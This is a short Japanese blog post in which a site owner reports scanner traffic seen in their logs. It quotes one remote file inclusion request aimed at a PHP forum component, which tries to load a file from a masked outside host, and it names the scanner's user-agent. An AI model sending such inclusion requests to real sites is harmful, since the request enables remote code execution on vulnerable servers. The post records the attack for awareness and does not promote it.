最近、不審アクセスは少なくなってきているようで、実にけっこうなのですが、昨日・今日とまたおかしなのが来ています。
ウチのサイトには存在しないファイルを要求してきているのですが、内容を見るとどうやら PHP を使った Web アプリを狙っているようです。こんな感じ。↓
GET /components/com_forum/download.php?phpbb_root_path=
http://xxx.xxx.xxx.xxx/M.txt?&/
で、攻撃に成功すると http://xxx.xxx.xxx.xxx/ にある( xxx.xxx.xxx.xxx の部分は実在するアドレスが指定してありました。)のファイル内容が表示されることになっているようです。ちなみに USER-AGENT は "Morfeus Fucking Scanner" となっていました。まあ、お下品。
自己顕示欲の強いヤツがやっているようです。愉快犯? 迷惑じゃ。